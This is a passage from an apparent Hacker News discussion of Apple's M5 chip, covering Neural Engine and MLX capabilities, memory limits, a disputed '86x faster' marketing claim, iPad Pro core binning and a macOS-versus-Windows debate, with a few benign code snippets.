    Doesn't that make sense, though? Each manipulates a different layer in the memory hierarchy, allowing the programmer to control the latency and throughput implications. I see it as a good thing.

  • RataNova an hour ago

    Apple's clearly betting big on on-device AI workflows becoming the norm

  • nullbyte 17 hours ago

    Thankfully, I think libraries like PyTorch abstract this stuff away. But it seems very convoluted if you're building something from the ground up.

    • gardnr 15 hours ago

      Does PyTorch support other acceleration? I thought they just support Metal.

      • joshuabaker2 12 hours ago

        You can convert a PyTorch model to an ONNX model that can use CoreML (or in some cases just convert it to a CoreML model directly)
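
        For the direct route, a minimal coremltools sketch (the toy model, shapes, and file name are made up for illustration):

            import torch
            import coremltools as ct

            # Any traceable PyTorch model works; this tiny one is a stand-in.
            model = torch.nn.Sequential(torch.nn.Linear(128, 64), torch.nn.ReLU()).eval()
            example = torch.randn(1, 128)
            traced = torch.jit.trace(model, example)

            mlmodel = ct.convert(
                traced,
                inputs=[ct.TensorType(shape=example.shape)],
                compute_units=ct.ComputeUnit.ALL,  # let Core ML place ops on CPU/GPU/ANE
            )
            mlmodel.save("tiny.mlpackage")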

  • twoodfin 16 hours ago

    Is this really strange? Matmul is just a specialized kind of primitive compute, one that is seeing an explosion in practical uses.

    A Mac Quadra in 1994 probably had floating point compute all over the place, despite the 1984 Mac having none.

  • jmrm 16 hours ago

    I wonder if some Apple-made software, like Final Cut, makes use of all of those "duplicated" instructions at the same time to get better performance...

    I know the multitasking nature of the OS probably makes this happen across different programs anyway, but it would nonetheless be pretty cool!

  • oskarkk 18 hours ago

    Would it be possible to use all of them at the same time? Not necessarily in a practical way, but just for fun? Could the different ways of doing this on the CPU be used to some extent by one core at the same time, given that it's superscalar?

  • HeckFeck 15 hours ago

    Adding CPUs and GPUs on top of your CPUs and GPUs... sounds like we've got the spiritual successor to the Sega Saturn.

  • hannesfur 20 hours ago

    I inferred that by "neural accelerators" they meant the Neural Engine cores, or it could be a bigger/different AMX (which really should become a standard, btw).

  • llm_nerd 13 hours ago

    >Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

    The "neural accelerator" is per GPU core, and is matmul. e.g. "Tensor cores".

eth0ws 9 hours ago

"When compared to Intel-based systems, it delivers up to 86x faster AI performance"

I'm imagining the engineers responsible for running the tests finely tuning the test suite for days and days so they could get that number into the press release, lol. There's no way that's a coincidence and someone definitely advocated for that line being the way it is.

https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

  • jdiff 7 hours ago

    I'm quite upset I have nobody I know in real life who will appreciate this line.

    • bigyabai 7 hours ago

      We've come a long way from the insidious-but-clear "I'm a Mac" ads to groanworthy-and-confusing "86x faster performance" promotional metrics.

  • Aperocky 7 hours ago

    What does AI performance even mean for Intel-based Mac systems? The last one was like 5 years ago.

    • bapak 6 hours ago

      Check all the comparisons on their website. They're not comparing their products to the previous gen, they're comparing them to years-old systems.

      They could sell you a downgrade and still claim 2x M1 Pro performance (it was 4x last year).

      Apple is a marketing company made to sell stuff.

      • nielsbot 5 hours ago

        > Apple is a marketing company made to sell stuff.

        That's like... every company? Are you saying they don't have good tech?

        • bapak 3 hours ago

          Marketing companies don't sell their own stuff, they sell others' stuff.

        • dimator 4 hours ago

          GP is saying their primary expertise is advertising. It's hard to watch any Apple announcement and not notice how utterly hyperbolic they are at touting their own achievements.

          Ya sure, you can say that every company must do that, but Apple is exceptional at it. Once you start noticing the unlabeled performance charts, the missing baselines, the comparisons with ages-old models, and the disingenuous "86x" metrics, the whole show becomes cringeworthy.

      • _kidlike 5 hours ago

        I've always disliked Apple because of its aggressive marketing.

    • XelNika 7 hours ago

      > production 1.7GHz quad-core Intel Core i7-based 13-inch MacBook Pro systems with Intel Iris Plus Graphics 645, 16GB of RAM, and 2TB SSD

      https://www.apple.com/macbook-pro/#footnote-4

      So yes, that is compared to a very old 14 nm design, presumably the i7-8557U per Wikipedia.

      • zingar 6 hours ago

        Your comment implies that it’s obviously not this spec that they compare against. Could you spell it out for the ignorant like me? What about that config makes it definitely not the thing that is 86x slower?

        • jdiff 4 hours ago

          I don't see anything in the GP that implies that. It's simply a CPU that was released before an entire AI economic bubble was a twinkle in Jensen Huang's eye. Of course it has piss-poor AI performance vs something with hardware dedicated to accelerating that workflow.

          It's not that the comparison is incorrect, just that it's a silly and unenlightening statement, bordering on completely devoid of meaning if it weren't for the x86 pun.

hannesfur 20 hours ago

It’s unfortunate that this announcement is still unspecific about what they improved in the Neural Engine. Since all we know about the Neural Engine comes from Apple papers or reverse engineering efforts (https://github.com/hollance/neural-engine), it’s plausible that they addressed some quirks to enable better transformer performance. They have written quite interesting papers on transformers on the Neural Engine:

- https://machinelearning.apple.com/research/neural-engine-tra...

- https://machinelearning.apple.com/research/vision-transforme...

Things have definitely gotten better with MLX on the software side, though it still seems they could do more in that area (let’s see what the M5 Max brings). But even if they made big strides here, it won’t help previous generations, and the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

  • trymas 20 hours ago

    > the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

    As you said - it won’t help previous generations, though since last year (or two??) all macs start with 16GB of memory. Even entry level macbook airs.

    • hannesfur 19 hours ago

      That's true! I was referring to their wider lineup, especially the iPad, where users will expect the same performance as on the Macs (they paid for an Mx chip), and yet they sold me an iPad Air this year that comes with a really fast M3 and still only 8 GB of RAM. (You only get 16 GB on the iPad Pro, btw, if you go with at least 1TB of storage on the M4 one.)

      • doug_durham 16 hours ago

        "They sold me"? You me you bought.

      • moi2388 19 hours ago

        Why would you expect the same performance on iPad and MacBook Pro?

        The latter has up to 128GB of memory?

        • hannesfur 19 hours ago

          You probably wouldn't with a Pro, but you might between an iPad Pro and a MacBook Air. With the Foundation Models API they basically said that there will be one size of model for the entire platform, making smarter models on a MacBook Pro unrealistic and only faster ones possible.

          • LoganDark 19 hours ago

            Isn't Private Cloud Compute already enabling the more powerful models to be run on the server? That way the on-device models don't have as much pressure to be The One.

          • moi2388 18 hours ago

            That’s fair

    • raverbashing 18 hours ago

      I bet Cook authorized the upgrade with gritted teeth, and I was all for it.

  • RataNova an hour ago

    No matter how fast your Neural Engine is, it's not much help if you're constantly juggling memory just to run a model

  • liuliu 19 hours ago

    Faster compute helps for things like vision language models that require a bigger context to be filled. My understanding is that the ANE is still optimized for convolution loads and compute efficiency, while the new neural accelerators are optimized for flexibility and performance.

    • zozbot234 19 hours ago

      The old ANE enabled arbitrary statically scheduled multiply-add, of INT8 or FP16. That's good for convolution but not specifically geared for it.

      • liuliu 18 hours ago

        I am not an expert on ANE, but I think it is related to the size of register files and how that is smaller than what we need for GEMM on modern transformers (especially these fat ones with MoE).

        • zozbot234 18 hours ago

          AIUI the ANE makes use of data in unified memory, not in the register file. So this wouldn't be an inherent limitation. (OTOH, that's why it wastes memory bandwidth for most newer transformer models, which use heavily quantized data - the ANE will have to read padded/unquantized values and the fraction of memory bandwidth that's used for that padding is pure waste.)

    • hannesfur 19 hours ago

      That would be an interesting approach if true. I hope someone gets to the bottom of it once we have hardware in our hands.

  • fooblaster 20 hours ago

    MLX still doesn't use the neural engine, right? I still wish they would abandon that unit and just center everything around Metal and tensor units on the GPU.

    • hannesfur 19 hours ago

      Oh, I overlooked that! You are right. Surprising… since Apple has shown that it’s possible through CoreML (https://github.com/apple/ml-ane-transformers)

      I would hope that the Foundation Models (https://developer.apple.com/documentation/foundationmodels) use the neural engine.
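
      For anyone poking at this: MLX today dispatches to the CPU and the GPU (via Metal) only. A minimal sketch of the path it does use:

          import mlx.core as mx

          a = mx.random.normal((1024, 1024))
          b = mx.random.normal((1024, 1024))
          c = a @ b    # recorded lazily
          mx.eval(c)   # forces computation on the default device (the GPU)
          print(c.shape)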

      • fooblaster 18 hours ago

        The neural engine not having a native programming model makes it effectively a dead end for external model development. It seems like a legacy unit that was designed for CNNs with limited receptive fields, and it just isn't programmable enough to be useful for the full set of models and operators available today.

        • hannesfur 18 hours ago

          That's sadly true. Over in x86 land things don't look much better, in my opinion: the corresponding accelerators on modern Intel and AMD CPUs (the "Copilot PCs") are very difficult to program as well. I would love to read a blog post on someone trying, though!

    • zozbot234 20 hours ago

      Wrt. language models/transformers, the Neural Engine/NPU is still potentially useful for the pre-processing (prompt prefill) step, which is generally compute-limited. For token generation you need memory bandwidth, so GPU compute with neural/tensor accelerators is preferable.
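
      A back-of-envelope version of the bandwidth argument, with every number an assumption: if each generated token has to stream the active weights through memory once, bandwidth divided by model size caps tokens per second.

          # All figures are illustrative assumptions, not measurements.
          bandwidth_gb_s = 150   # ballpark unified-memory bandwidth, base-M-class chip
          model_gb = 4.0         # e.g. a ~7B-parameter model at ~4-bit quantization
          print(f"decode ceiling: ~{bandwidth_gb_s / model_gb:.0f} tokens/s")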

      • fooblaster 19 hours ago

        I think I'd still rather have the hardware area put into tensor cores for the GPU instead of this unit that's only programmable with ONNX.

    • llm_nerd 18 hours ago

      MLX is a training/research framework, and the work product is usually a CoreML model. A CoreML model will use any and all resources that are available to it, at least if the resource fits for the need.

      The ANE is for very low power, very specific inference tasks. There is no universe where Apple abandons it, and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs. The ANE is how your iPhone extracts every bit of text from images and subject matter information from photos with little fanfare or heat, or without destroying your battery, among many other uses. It is extremely useful for what it does.

      >tensor units on the GPU

      The M5 / A19 Pro are the first chips with so-called tensor units. e.g. matmul on the GPU. The ANE used to be the only tensor-like thing on the system, albeit as mentioned designed to be super efficient and for very specific purposes. That doesn't mean Apple is going to abandon the ANE, and instead they made it faster and more capable again.

      • zozbot234 17 hours ago

        > ...and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs

        That seems like a strange comment. I've remarked in this thread (and other threads on this site) about what's known re: low-level ANE capabilities, and it seems to have significant potential overall, even for some part of LLM processing. I'm not expecting it to be best-in-class at everything, though. Just like most other NPUs that are also showing up on recent laptop hardware.

      • almostgotcaught 18 hours ago

        > the work product is usually a CoreML model.

        What work product? Who is running models on Apple hardware in prod?

        • tehnub 10 hours ago

          Any iPhone or iPad app that does local ML inference?

          • almostgotcaught 8 hours ago

            Yes please tell us which apps those are

            • klausa 3 hours ago

              The keyboard. Or any of the features in Photos.app that do classification on-device.

        • llm_nerd 18 hours ago

          An enormous number of people and products. I'm actually not sure if your comment is serious, because it seems to be of the "I don't, therefore no one does" variety.

          • bigyabai 18 hours ago

            Enormous compared to what? Do you have any numbers, or are you going off what your X/Bluesky feed is telling you?

            • llm_nerd 18 hours ago

              I'm super not interested in arguing with the peanut gallery (meaning people who don't know the platform but feel that they have absolute knowledge of it), but enough people have apps with CoreML models in them, running across a billion or so devices. Some of those models were developed or migrated with MLX.

              You don't have to believe this. I could not care less if you don't.

              Have a great day.

              • bigyabai 18 hours ago

                I don't believe it. MLX is a proprietary model format and usually the last to get supported on Huggingface. Given that most iOS users aren't selecting their own models, I genuinely don't think your conjecture adds up. The majority of people are likely using safetensors and GGUF, not MLX.

                If you had a source to cite then it would remove all doubt pretty quickly here. But your assumptions don't seem to align with how iOS users actually use their phone.

                • llm_nerd 17 hours ago

                  Cite a source? That CoreML models are prolific on Apple platforms? That Apple devices are prolific? Search for it yourself.

                  You seem set on MLX and apparently on your narrow view of what models are. This discussion was about ANE vs "tensor" units on the GPU, and someone happened to mention MLX in that context. I clarified the role of MLX, but that from an inference perspective most deployments are CoreML, which will automatically use ANE if the model or some subset fits (which is actually fairly rare as it's a very limited -- albeit speedy and power efficient -- bit of hardware). These are basic facts.

                  >how iOS users actually use their phone.

                  What does this even mean? Do you think I mean people are running Qwen3-Embedding-4B in pytorch on their device or something? Loads of apps, including mobile games, have models in them now. This is not rare, and most users are blissfully unaware.

                  • kanaffa12345 17 hours ago

                    > That CoreML models are prolific on Apple platforms? That Apple devices are prolific?

                    correct and non-controversial

                    > An enormous number of people and products [use CoreML on Apple platforms]

                    non-sequitur

                    EDIT: i see people are not aware of

                    https://en.wikipedia.org/wiki/Simpson%27s_paradox

              • kanaffa12345 17 hours ago

                [flagged]

                • llm_nerd 17 hours ago

                  [flagged]

                  • koolala 17 hours ago

                    Can you share an example of the apps you mean? Maybe that would clear up any confusion.

  • xiphias2 13 hours ago

    My guess is that they moved the systolic arrays inside the GPU cores just like how it's done in modern NVIDIA chips.

    That's the only way to speed up MLX 4x compared to M4.

  • zuspotirko 18 hours ago

    Of course it's true. Unified memory is always less than VRAM, and my 16GB of VRAM isn't enough.

    But I think it's also a huge issue that Apple makes storage so expensive. If Apple wants local AI to answer your questions, it should be able to take your calendar, emails, text messages, photos, journal entries, etc. into account. It can't do that as nicely as long as customers opt for only 256GB or 1TB devices due to cost.

  • JKCalhoun 19 hours ago

    I can only guess that significant changes in hardware have longer lead times than software (for example). I suppose I am not expecting anything game-changing until the M6.

smolder 6 hours ago

Let's not pretend these are machines for hardcore computing jobs, which belong on servers in terms of work per cost. Apple's laptops are still amazing because we can do crazy amounts of work quickly without running out of battery. The edit, recompile, test loop is fast for programmers equipped with these expensive machines. And you can carry them everywhere without much risk of failure.

  • hmottestad 2 hours ago

    I don't think anyone is pretending that a MacBook Pro can compare to 8 H100 cards from Nvidia in terms of LLM training or for serving LLMs. But you can buy an awful lot of MacBooks for the price of 8 H100 GPUs.

    But if your workload belongs on 8 H100 GPUs, then there isn't much point in trying to run it on a MacBook. You'd be better served by renting them by the hour, or if you have a quarter million dollars you can always just purchase them outright.

    The H100 is just an example, this is true for any workload that doesn't fit on a laptop.

  • croemer 2 hours ago

    If you work on scripts that run in a minute or two, it's not worth the hassle of running them on servers. Yet that's long enough that saving 50% is meaningful. I happen to often work on such tasks, so I really notice improvements in single- and multi-core performance.

alberth 19 hours ago

Apple is binning the iPad Pro chips:

   Storage      CPU
   ≤ 512GB      3 P-cores (and 6 E-cores)
   1TB+         4 P-cores (and 6 E-cores)

https://www.apple.com/ipad-pro/specs/

  • ip26 5 hours ago

    The sales volume of the 1TB+ models has got to be fairly low, which makes this fascinating. Since they are being somewhat quiet about it (rather than trumpeting "the 1TB+ models are even faster!"), it suggests the P-cores don't yield well enough to support 4 P-cores in the 256GB and 512GB SKUs.

  • xangel 17 hours ago

    [flagged]

  • tempaccount420 15 hours ago

    Storage-gating is really disgusting considering how much Apple charges for storage.

    • aloer 14 hours ago

      iirc in the past it was about memory and that larger storage needs more memory for caching.

      So this made at least some sense.

      I guess yields might be good enough that they can afford to bin with another core in there as well.

      Memory is probably still the main reason for binning in the first place.

      • SchemaLoad 6 hours ago

        I figure it's probably just reducing SKUs. The people who care about the fastest chip are likely also the people wanting lots of storage so you can save on having to create a ton more products by bundling them.

      • alberth 9 hours ago

        My guess is that the lower-storage-tier iPad Pros are getting the "defective" MacBook Pro chips.

    • Schiendelman 9 hours ago

      Still? They really don't overcharge. The storage they sell is much, much, much faster than what everyone compares it to at lower prices.

      • tempaccount420 9 hours ago

        You can get Mac Studio 3rd-party "SSDs" for less than half the price Apple charges for the same storage, with the same performance; they even use the same flash chips!

      • dzhiurgis 9 hours ago

        I wouldn't mind some cheap, slow storage. SD cards / USB-C mini plugs aren't really a great option.

allthebestforus 36 minutes ago

Is this the first time Apple has released just the base chip, and not the Pro or Max version, at the same time?

Are they trying to milk the market in small increments? Especially before Christmas.

The MBP 14 M5 release came a bit unexpectedly; many analysts expected the beginning of 2026.

When will the M5 Pro and Max be released?

What are your thoughts on comparing the M4 Pro against the base M5?

toddmorey 21 hours ago

The modern Apple feels like its hardware teams are way outperforming its software teams.

  • linguae 20 hours ago

    This is not the first time this has happened in Apple’s history. The transition from the 68k architecture to the PowerPC brought major performance improvements, but Apple’s software didn’t take full advantage of it. If I remember correctly, even after the PowerPC switch, core elements of the classic Mac OS still ran in emulation as late as Mac OS 9. Additionally, the classic Mac OS lacked protected memory and preemptive multitasking, leading to relatively frequent crashes. Taligent and Copland were attempts to address these issues, but they both faced development hell, culminating with the purchase of NeXT and the development of Mac OS X. But by the time Mac OS X was released, PowerPC was becoming less competitive than the x86, culminating with the Intel switch in 2006. At this point it was Apple’s software that distinguished Macs from the competition, which remained the case until the M1 Macs were released five years ago.

    • mikepurvis 20 hours ago

      Sixteen years ago, John Gruber wrote:

      > Hardware and software both matter, and Apple’s history shows that there’s a good argument to be made for developing integrated hardware and software. But if you asked me which matters more, I wouldn’t hesitate to say software. All things considered I’d much prefer a PC running Mac OS X to a Mac running Windows.

      https://daringfireball.net/2009/11/the_os_opportunity

      At the time I'd only been a Mac user for a few years and I would have strongly agreed. But definitely things have shifted— I've been back on Windows/WSL for a number of years, and it's software quality/compatibility issues that are a lot of what keeps me from trying another Mac. Certainly I'm far more tempted by the hardware experience than I am the software, and it's not even really close.

      • selectodude 20 hours ago

        That’s so wild to me - my personal laptop is still a Mac but I’m in windows all day for work. Some of the new direction of macOS isn’t awesome but the basics are still rock solid. Touchpad is perfect, sleep works 100% of the time for days on end, still has UNIX underneath.

        • pico303 20 hours ago

          Same boat, and 100% agree. I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better. Windows' only saving grace, as a developer, is WSL.

          For a simple example, no app remembers the last directory you were working in. The keys each app uses are completely inconsistent from app to app. And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor. Then there’s the Windows 95-style dialog boxes mixed in with the Windows 11-style dialog boxes; what a UI mess. I spoke with one vendor the other day who was actually proud they’d adopted a ribbon interface in their UI “just like Office” and I verbally laughed.

          From a hardware perspective, I still don’t understand why Windows and laptop manufacturers can’t get sleep working right. My Intel MacBook Pro with an old battery still sleeps and wakes and lasts for several hours, while my new Windows laptop lasts about an hour and won’t wake from hibernate half the time without a hard reboot.

          I think Windows is “good enough” for most people.

          • BeetleB 18 hours ago

            > I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better.

            While overall I may say MacOS is better, I would not say it's better in every way.

            Believe it or not, I had a better experience with 3rd party window managers in Windows than on MacOS.

            I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

            And for corporate work, the integration with Windows is much better than anything I've seen on MacOS.

            Mac HW is great. The OS is in that uncanny valley where it's UNIX, but not as good as Linux.

            • robenkleene 16 hours ago

              > I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

              Did you try Keyboard Maestro? https://www.keyboardmaestro.com/main/ (I've never used AutoHotKey and I'd be super curious if there are deficiencies in KM relative to it, but Keyboard Maestro is, from my perspective, a masterpiece; it's hard to imagine it being any better.)

              Also I think this statement needs a stronger defense given macOS includes Shortcuts, Automator, and AppleScript, I don't know much about Windows automation but I've never heard of them having something like AppleScript (that can say, migrate data between applications without using GUI scripting [e.g., iterate through open browser tabs and create todos from each of them operating directly on the application data rather than scripting the UI]).
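
              A hedged sketch of that kind of app-level scripting, driven from Python via osascript just for illustration (the AppleScript one-liner is the real interface, and Safari will prompt for automation permission the first time):

                  import subprocess

                  # Ask Safari for the URL of every open tab via its AppleScript dictionary.
                  script = 'tell application "Safari" to get URL of every tab of every window'
                  out = subprocess.run(
                      ["osascript", "-e", script],
                      capture_output=True, text=True, check=True,
                  ).stdout

                  # osascript flattens the result into a comma-separated list.
                  urls = [u.strip() for u in out.split(",") if u.strip()]
                  print(urls)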

              • wingworks 13 hours ago

                Yeah, the things that AppleScript can do are so crazy. I've fully automated keeping one tab in Chrome logged into a website that insists on logging me out every hour or something. (not banking or anything)

          • jpalawaga 18 hours ago

            Macs also can't get sleep right. Have you tried to make a MacBook consistently stay 'awake' when the lid is closed?

            You can't, really. Almost everyone resorts to buying an HDMI dongle to fake a display. Apple solved the problem at such a low level that the flexibility to run something in clamshell mode is broken, even when using caffeine/amphetamine/etc.

            So, tradeoffs. They made their laptops go to sleep very well, but broke functionality in the process. You can argue it's a good tradeoff, just acknowledge that there WAS a tradeoff made.

            • cyberpunk 16 hours ago

              Counter-example: I ran an Air without a monitor connected for years using Caffeine; it worked perfectly for me.

          • prewett 18 hours ago

            > Windows' only saving grace, as a developer, is WSL.

            So, Windows' saving grace is being able to run a different operating system inside it? Damning with faint praise if I ever heard it...

            • dboreham 16 hours ago

              Also the control key works.

              • simonh 16 hours ago

                Just enable space bar heating.

          • strbean 17 hours ago

            > And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor.

            Oh god, I'm going to have to bite the bullet and switch to 11, huh?

            The one thing that has been saving me from throwing my PC out the window in rage has been the monitor I have that supports a "keep alive" mode where switching inputs is transparent to the computers connected to it. So when switching inputs between my PC and laptop neither one thinks the monitor is being disconnected/reconnected. If it wasn't for that, I'd be screaming "WHY ARE YOU MOVING ALL MY WINDOWS?" on a regular basis. (Seriously, why are you moving all my windows? Sure, if they're on the display that was just disconnected, I get you. But when I connect a new display, Windows 10 seems to throw a dart at the display space for every window and shuffle them to new locations. Windows that live in a specific place on a specific display 100% of the time just fly around for no reason. Please god just stop.)

        • oritron 20 hours ago

          > the basics are still rock solid

          A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail). A number of others were affected by the same issue. There have been show-stopper bugs in the core functionality of Photos as well. I don't get the impression that the basics are Apple's focus with respect to software.

          • simonask 19 hours ago

            It’s not as if such bugs are unheard of for Windows users, and certainly not Linux users.

            But I’ve certainly never struggled with getting WiFi to work on a Mac, or struggled with getting it to sleep/wake, or a host of other problems you routinely have on both Windows and Linux.

            It’s not even close.

            • oritron 19 hours ago

              I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

              To compare Apples to apples, you'd have to look at a Framework computer and agree that wifi is going to work out of the box... but here I'm meeting you on a much weaker argument: "Apple's software basics are /not/ rock solid, but other platforms have issues too"

              • robenkleene 16 hours ago

                > I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

                I don't find your original anecdote convincing:

                > A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail).

                E.g., what does this mean? They lost mail messages? How did they verify they had those messages before and after? E.g., file-system operations? GUI search? How much do they know about how Mail app stores message (e.g., I used to try understand this decades ago, but I expect today messages aren't even necessarily always stored locally)? How are you syncing mail messages, e.g., using native IMAP, or whatever Gmail uses, or Exchange? What's the email backend?

                E.g., without deeper evidence this sounds more like a mail-message indexing issue than a mail-messages-stored-on-disk issue. (In 2025, I'd personally have zero expectations about how Mail manages messages on disk; I'd expect local storage of messages to be dynamically managed, like most applications that aren't document-based, using a combination of cloud functionality and local caching. E.g., I found this in a quick search: https://apple.stackexchange.com/questions/471801/ensure-maco...) If you have stronger evidence I'd love to hear it, but as presented you're extrapolating much stronger conclusions than the anecdote warrants, in my opinion.

                • oritron 14 hours ago

                  Mail deleted a large number of messages but not all of them. It was stored in files (which were smaller on disk, so not an indexing issue) and recovery required loading snapshots from Time Machine, converting to a format Thunderbird could import and transitioning to that.

                  • robenkleene 14 hours ago

                    You've only addressed something like 30% of the issues I asked about (although I'm honestly impressed you got that far). E.g., I wouldn't call Apple Mail an application designed to manage a collection of emails on disk. Isn't the important question here whether the emails were still stored on the server? Or were they using POP?

            • afandian 19 hours ago

              I've been using Mac OS since 10.3 and, whilst it's better now, I've had a memorable number of wifi connection bugs. And ISTR issues with waking from sleep, but that might have been before the Intel migration. It's never been immune from bugs.

            • philsnow 17 hours ago

              > But I’ve certainly never struggled with getting WiFi to work on a Mac

              I want to be able to set different networking options (manual DNS, etc) for different wifi networks, but as far as I can tell, I can only set them per network interface.

              There's something like "locations" but last time I tried using that, the entire System Settings.app slowed to a crawl / beachballed until I managed to turn it back off.

              > or struggled with getting it to sleep/wake

              My m1 MBP uses something like 3-5% of its battery per hour while sleeping, because something keeps waking it up. I tried some app that is designed to help you diagnose the issue but came up empty-handed.

              ... but yes on both counts, it's light years better than my last experience with Linux, even on hardware that's supposed to have fantastic support (thinkpads).
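
              One low-tech thing to try (a sketch around the stock pmset CLI; the log format varies across macOS versions, so the string matching here is an assumption):

                  import subprocess

                  # pmset -g log dumps the power-management history, including wake events.
                  log = subprocess.run(
                      ["pmset", "-g", "log"], capture_output=True, text=True, check=True
                  ).stdout

                  for line in log.splitlines():
                      if "Wake" in line and "due to" in line:  # wake events name a cause
                          print(line)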

        • a456463 11 hours ago

          I come back to my work MBP M2 dead almost every day, and I have to leave it charging or wait 15 minutes for the Mac to decide that it is okay to boot, even when power has been connected.

        • eitally 19 hours ago

          I've been primarily on a Macbook for the past three years, after almost 10 years using Chromebooks as my primary machines (yay work at Google). Until 2015, I had been a rabid defender of Thinkpads (T-series, mostly), and used Windows at work and Linux (mostly Kubuntu) at home, from around 2009-2015.

          Long story short, I was very happy with the "it just works" of ChromeOS, and only let down by the lack of support for some installed apps I truly needed in my personal life. I tried a Mac back in 2015 but couldn't get used to how different it was, and it felt very bulky compared to ChromeOS and much slower than the Linux machine I'd had, so I switched to a Pixelbook and was pretty content.

          Fast forward to 2023 when I needed to purchase a new personal laptop. I'd bought my daughter a Pixelbook Go in 2021 and my son a Lenovo x1 Carbon at the same time. Windows was such a dumpster fire I absolutely ruled it out, and since I could run all the apps I needed on ChromeOS it was between Linux & Mac. I decided to try a Mac again, for both work & personal, and I've been a very happy convert ever since.

          My M2 Pro has been rock solid, and although I regret choosing to upgrade to Sequoia recently, it still makes me feel better than using Windows. M4 Pro for work is amazingly performant and I still can't get over the battery efficiency. The nicest thing, imho, is that the platform has been around long enough for a mature & vibrant ecosystem of quality-of-life utilities to exist at this point, so even little niggles (like why do I need the Scroll Reverser app at all?) are easy to deal with, and all my media editing apps are natively available.

          • TheAmazingRace 14 hours ago

            Sequoia is honestly a fair sight better than Tahoe. It's only downhill from here!

        • sofixa 19 hours ago

          > sleep works 100% of the time for days on end

          In my case it works roughly ~50% of the time. Probably because of the Thunderbolt monitor connected to power it, idk.

          > the basics are still rock solid

          The basics like the OS flat out refusing to provide you any debugging information on anything going wrong? It's rock solid alright. I had an issue where occasionally I would get an error: "a USB device is using too much power, try unplugging it and replugging it." Which device? Why the hell would Apple tell you that? Where would the fun be in that?

          Key remapping requires installing what amounts to a keylogger, and you can't have a different scroll direction for the mouse and the touchpad. There's still no built-in window management, which for the sizes of modern monitors is quite constraining.

          > still has UNIX underneath

          A very constrained UNIX. A couple of weeks ago I wanted to test something (pkcs11-tool signing with a software HSM), and it turns out that Apple has decided that libraries can only be loaded from a number of authorised locations which can only be accessed while installing an application. You can't just use a dynamic library you're linking to; it has to be part of a wider install.

        • MichealCodes 20 hours ago

          The basics are not rock solid. Even a core feature such as remote management crashes and freezes every 5 minutes when you connect from a non-Apple machine; many have reported this over the years, but Apple just does Apple. Safari is still atrocious when it comes to web API support. The worst part is that, with Apple, we do not know if these are intentional anti-competitive barriers or actual software bugs. I purchased a Mac mini simply to compile apps via Xcode and can say the core experience is MUCH more buggy than a fresh Windows or Ubuntu install.

          Edit: Hard to call intentionally preventing support for web APIs a power-user thing. This creates more friction for basic users trying to use any web app.

          Edit2: lol Apple PR must be all over this, went from +5 to -1 in a single refresh. Flagged for even criticizing what they intentionally break.

          • selectodude 20 hours ago

            Safari adds hours of battery life due to its hyper focus on power consumption. The level to which web API standards are affected is rather immaterial to me. I imagine we’re different consumers though.

            • MichealCodes 20 hours ago

              Adds hours of battery life at the expense of making your microphone input completely inaudible due to throttling if you background the tab it's running in.

              On iOS you cannot even keep a web app running in the background. The second you multitask, even with audio/microphone active, Apple kills it. Are they truly adding battery life, or are they cheating by creating restrictions that prevent apps from working?

              Being able to conduct a voice call through the browser seems like a pretty basic use case to me.

            • socalgal2 18 hours ago

              If you’re comparing to Chrome, tests show it’s no longer true

            • ahmeneeroe-v2 18 hours ago

              I am in the same boat. I prefer battery life

              • MichealCodes 18 hours ago

                Breaking things is not extending battery life; battery life assumes functionality. Breaking functionality to extend it is a cop-out, and the break-whatever-you-want approach could be offered as a mode instead of a one-size-fits-all, we-don't-care-what-breaks default.

          • butlike 20 hours ago

            They said the basics are rock solid (to which I agree). What you're describing I'd consider "power user" territory.

          • astrange 18 hours ago

            Why would you want to support web APIs? They're all just Google proposing 5000 new ways for advertisers to fingerprint you but doing it through "standards".

            • MichealCodes 17 hours ago

              Nice strawman. The core of web APIs is about opening up lower-level functionality to the sandbox/accessibility of the web. Beyond audio and video IO, there's great stuff coming with WebGPU and WebNN. Web apps are much safer and much more convenient than downloading an app; well, in theory they could be, if support weren't regularly sabotaged to protect a corporate interest in walled gardens.

          • foldr 20 hours ago

            Are those basics? You don’t have to use Safari, and I’ve never used remote management over the 20 years or so that I’ve been a Mac user.

            • MichealCodes 20 hours ago

              If we dismiss remote management as a non-core feature shouldn't we consider installing a new browser to be advanced usage as well?

              I understand that this post is about MacOS, but yes, we are forced to support Safari for iOS. Many of these corporate decisions to prevent web apps from functioning properly spill over from MacOS Safari to iOS Safari.

      • KeplerBoy 20 hours ago

        I bet most people around here would prefer fully supported linux over mac os on their apple silicon.

        • vuggamie 20 hours ago

          The best part of MacOS for me is the unix tools. The command line is a real unix command line. And the rest just works. If I need a linux environment I ssh into a VPS.

          • BeetleB 18 hours ago

            > If I need a linux environment I ssh into a VPS.

            I want good window management. Linux gives me a huge number of options. MacOS - not as much.

          • ghaff 19 hours ago

            It doesn't matter for everyone/most. But, yes, having a Unix command line within MacOS is a pretty big win for some of us. Not something I use on a daily basis certainly. And I'd probably set up a Linux box (or ssh into one) if I really needed that routinely. But it's a nice bonus.

          • a456463 11 hours ago

            Unix tools that are barely supported, by an external community, via brew or MacPorts? A Mac is not a dev machine. It is a dev-hostile machine.

          • epistasis 20 hours ago

            Or even just containers on the Mac. Unless you need a GPU with specific hardware, or to connect to a cluster, there's an ever-decreasing need to use remote boxes.

          • Daneel_ 19 hours ago

            Well, kind of... the commands on macOS are all just a little bit different and a little bit janky. I still had to relearn all the common commands I use in order to function. I survived 6 months before I went back to a Windows/WSL combo.

            • MobiusHorizons 19 hours ago

